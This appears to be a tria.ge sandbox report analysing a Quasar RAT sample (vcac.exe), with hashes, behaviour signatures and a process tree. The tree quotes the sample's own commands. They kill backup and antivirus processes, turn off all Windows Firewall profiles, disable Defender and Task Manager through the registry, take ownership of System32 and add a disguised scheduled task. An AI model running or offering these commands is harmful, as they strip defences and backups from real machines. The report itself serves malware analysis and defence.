Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

vcac.exe

windows7-x64

10

vcac.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    160s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system
  • submitted
    11/10/2023, 05:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vcac.exe

  • Size

    24.2MB

  • MD5

    456917c4f5c2843f8dad38d227ecf0c2

  • SHA1

    de949b64553dd28524f6ae722a939541ada85f1f

  • SHA256

    2e724b4185329154ed2e90817cf2cb30e94c31803385d0d77d97a35bedeea057

  • SHA512

    8fe19aec29f4e1112374b6c1ebf354130cde6cf945fda0ba25a765bec1b031b0e3fcfcf7fbffff1d1e0432059bd668f1dc39770bbcef7345a3ddb4bdc69968a7

  • SSDEEP

    98304:IKBbBWIgWljGxRB/LL6vc22SsaNYfdPBldt6+dBcjHVCU688cIyGOk3ta:p4xRBjgB7j4U6gl

Score
10/10
quasarbootkitdiscoveryevasionexploitpersistencespywaretrojan

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    䬀䌀唀尀匀漀昀琀眀愀爀攀尀䴀椀挀爀漀猀漀昀琀尀圀椀渀搀漀眀猀尀䌀甀爀爀

  • reconnect_delay

    1

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar payload 1 IoCs
  • Disables Task Manager via registry modification
    evasion
  • Modifies Windows Firewall 1 TTPs 5 IoCs
    evasion
  • Possible privilege escalation attempt 2 IoCs
    exploit
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
    discovery
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 42 IoCs
    evasion
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vcac.exe
    "C:\Users\Admin\AppData\Local\Temp\vcac.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
      2⤵
        PID:2684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Users\Admin\AppData\Roaming\lm.exe
          lm.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Writes to the Master Boot Record (MBR)
          PID:2832
      • C:\Users\Admin\AppData\Roaming\mbr.exe
        "C:\Users\Admin\AppData\Roaming\mbr.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of WriteProcessMemory
        PID:2496
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
          3⤵
          • Creates scheduled task(s)
          PID:2476
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        PID:2164
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
          3⤵
            PID:2476
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:2376
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32 /grant "Admin:F"
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2400
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:672
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecAgentBrowser*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2564
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecDiveciMediaService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecJobEngine*
            3⤵
            • Kills process with taskkill
            PID:2816
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecManagementService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1748
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM vss*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2944
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM sql*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2572
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM svc$*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1148
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM memtas*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:856
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM sophos*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM veeam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2948
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM backup*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:648
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxVss*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2464
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxBlr*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1860
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxFWD*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1308
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxCVD*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:540
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxCIMgr*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2860
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM DefWatch*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2004
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM ccEvtMgr*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2652
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM SavRoam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:748
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM RTVscan*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2248
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM QBFCService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1688
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM Intuit.QuickBooks.FCS*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2220
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM YooBackup*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1236
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM YooIT*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:864
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM zhudongfangyu*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1704
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM sophos*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1760
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM stc_raw_agent*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2172
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM VSNAPVSS*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM QBCFMonitorService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1600
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM VeeamTransportSvc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2076
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM VeeamDeploymentService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2708
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM VeeamNFSSvc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2764
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM veeam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2672
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM PDVFSService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2836
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecVSSProvider*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2528
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecAgentAccelerator*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2520
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecRPCService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2736
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM AcrSch2Svc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1800
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM AcronisAgent*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2396
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM CASAD2DWebSvc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1028
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM CAARCUpdateSvc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM TeamViewer*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1340
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:476
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state off
            3⤵
            • Modifies Windows Firewall
            PID:1300
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set currentprofile state off
            3⤵
            • Modifies Windows Firewall
            PID:2404
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set domainprofile state off
            3⤵
            • Modifies Windows Firewall
            PID:1752
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set privateprofile state off
            3⤵
            • Modifies Windows Firewall
            • Suspicious use of AdjustPrivilegeToken
            PID:2816
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set publicprofile state off
            3⤵
            • Modifies Windows Firewall
            PID:2576
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
            3⤵
              PID:1708
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              3⤵
              • Modifies registry key
              PID:2956
            • C:\Windows\SysWOW64\reg.exe
              REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
              3⤵
              • Modifies registry key
              PID:1252
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionExtension .exe
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2152

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\VCRUNTIME140D.dll
          Filesize

          111KB

          MD5

          b59b0f6193bcc7e78a3b2fc730196be3

          SHA1

          045469fec2df2a9c75b550984a0ed32db2e9f846

          SHA256

          003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

          SHA512

          73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

          Download Submit

        • C:\Users\Admin\AppData\Roaming\boot.bin
          Filesize

          512B

          MD5

          89f33a6a15a162e2143df9d9fbfe7140

          SHA1

          0564134f891d34a8d70f34da5f2ad698780d5bf0

          SHA256

          80183480be2d892a1efbf34a0bbcdd7b7284018396f94d32ab6b9f756ee269e1

          SHA512

          fe7efbc80d7d6604cbcac08a1f8ae38ebfbb743715701b637c908aae27110d7b8ade98c764aa5a2ebfdf45d382f96b8b348016dbe9b9817f5695a637796467f0

          Download Submit

        • C:\Users\Admin\AppData\Roaming\lm.exe
          Filesize

          39KB

          MD5

          86e3192ad129a388e4f0ac864e84df78

          SHA1

          70a2b1422b583c2d768a6f816905bc85687ced52

          SHA256

          4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

          SHA512

          f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

          Download Submit

        • C:\Users\Admin\AppData\Roaming\lm.exe
          Filesize

          39KB

          MD5

          86e3192ad129a388e4f0ac864e84df78

          SHA1

          70a2b1422b583c2d768a6f816905bc85687ced52

          SHA256

          4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

          SHA512

          f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

          Download Submit

        • C:\Users\Admin\AppData\Roaming\mbr.exe
          Filesize

          101KB

          MD5

          00e306f18b8cc56f347f34a7ebaf7f9f

          SHA1

          2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

          SHA256

          ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

          SHA512

          2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

          Download Submit

        • C:\Users\Admin\AppData\Roaming\mbr.exe
          Filesize

          101KB

          MD5

          00e306f18b8cc56f347f34a7ebaf7f9f

          SHA1

          2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

          SHA256

          ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

          SHA512

          2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

          Download Submit

        • C:\Users\Admin\AppData\Roaming\settings.bat
          Filesize

          67B

          MD5

          a204d9e5059a5449af7af765d371d6ea

          SHA1

          cfc6f78545bdc6a1c82491500f1bacfb38bef28c

          SHA256

          d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

          SHA512

          d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

          Download Submit

        • C:\Users\Admin\AppData\Roaming\svchost.exe
          Filesize

          41KB

          MD5

          84177654d8bbd32fe8132265e7a598ec

          SHA1

          73bbb239d1449b3af2d7f53614ba456c1add4c9a

          SHA256

          af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

          SHA512

          6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

          Download Submit

        • C:\Users\Admin\AppData\Roaming\svchost.exe
          Filesize

          41KB

          MD5

          84177654d8bbd32fe8132265e7a598ec

          SHA1

          73bbb239d1449b3af2d7f53614ba456c1add4c9a

          SHA256

          af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

          SHA512

          6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

          Download Submit

        • C:\Users\Admin\AppData\Roaming\ucrtbased.dll
          Filesize

          1.4MB

          MD5

          ceeda0b23cdf173bf54f7841c8828b43

          SHA1

          1742f10b0c1d1281e5dec67a9f6659c8816738ad

          SHA256

          c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

          SHA512

          f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

          Download Submit

        • \Users\Admin\AppData\Roaming\lm.exe
          Filesize

          39KB

          MD5

          86e3192ad129a388e4f0ac864e84df78

          SHA1

          70a2b1422b583c2d768a6f816905bc85687ced52

          SHA256

          4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

          SHA512

          f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

          Download Submit

        • \Users\Admin\AppData\Roaming\mbr.exe
          Filesize

          101KB

          MD5

          00e306f18b8cc56f347f34a7ebaf7f9f

          SHA1

          2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

          SHA256

          ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

          SHA512

          2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

          Download Submit

        • \Users\Admin\AppData\Roaming\mbr.exe
          Filesize

          101KB

          MD5

          00e306f18b8cc56f347f34a7ebaf7f9f

          SHA1

          2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

          SHA256

          ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

          SHA512

          2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

          Download Submit

        • \Users\Admin\AppData\Roaming\svchost.exe
          Filesize

          41KB

          MD5

          84177654d8bbd32fe8132265e7a598ec

          SHA1

          73bbb239d1449b3af2d7f53614ba456c1add4c9a

          SHA256

          af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

          SHA512

          6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

          Download Submit

        • \Users\Admin\AppData\Roaming\ucrtbased.dll
          Filesize

          1.4MB

          MD5

          ceeda0b23cdf173bf54f7841c8828b43

          SHA1

          1742f10b0c1d1281e5dec67a9f6659c8816738ad

          SHA256

          c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

          SHA512

          f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

          Download Submit

        • \Users\Admin\AppData\Roaming\vcruntime140d.dll
          Filesize

          111KB

          MD5

          b59b0f6193bcc7e78a3b2fc730196be3

          SHA1

          045469fec2df2a9c75b550984a0ed32db2e9f846

          SHA256

          003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

          SHA512

          73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

          Download Submit

        • memory/2072-2-0x0000000074200000-0x00000000748EE000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/2072-76-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2072-0-0x0000000074200000-0x00000000748EE000-memory.dmp

          Filesize

          6.9MB

          Download

        • memory/2072-73-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2072-1-0x0000000000070000-0x00000000018AC000-memory.dmp

          Filesize

          24.2MB

          Download

        • memory/2072-5-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2072-4-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2072-3-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2152-86-0x00000000028A0000-0x00000000028E0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2152-84-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2152-96-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2152-94-0x00000000028A0000-0x00000000028E0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2152-93-0x00000000028A0000-0x00000000028E0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2152-92-0x00000000028A0000-0x00000000028E0000-memory.dmp

          Filesize

          256KB

          Download

        • memory/2152-91-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2152-90-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2152-85-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

          Download

        • memory/2164-81-0x000000001A680000-0x000000001A700000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2164-79-0x000000001A680000-0x000000001A700000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2164-89-0x000000001A680000-0x000000001A700000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2164-77-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2164-74-0x000000001A680000-0x000000001A700000-memory.dmp

          Filesize

          512KB

          Download

        • memory/2164-42-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

          Filesize

          9.9MB

          Download

        • memory/2164-41-0x0000000000210000-0x0000000000220000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2496-36-0x0000000000400000-0x0000000000423000-memory.dmp

          Filesize

          140KB

          Download

        • memory/2620-15-0x0000000000170000-0x0000000000190000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2832-17-0x0000000000140000-0x0000000000160000-memory.dmp

          Filesize

          128KB

          Download

        • memory/2832-25-0x0000000000140000-0x0000000000160000-memory.dmp

          Filesize

          128KB

          Download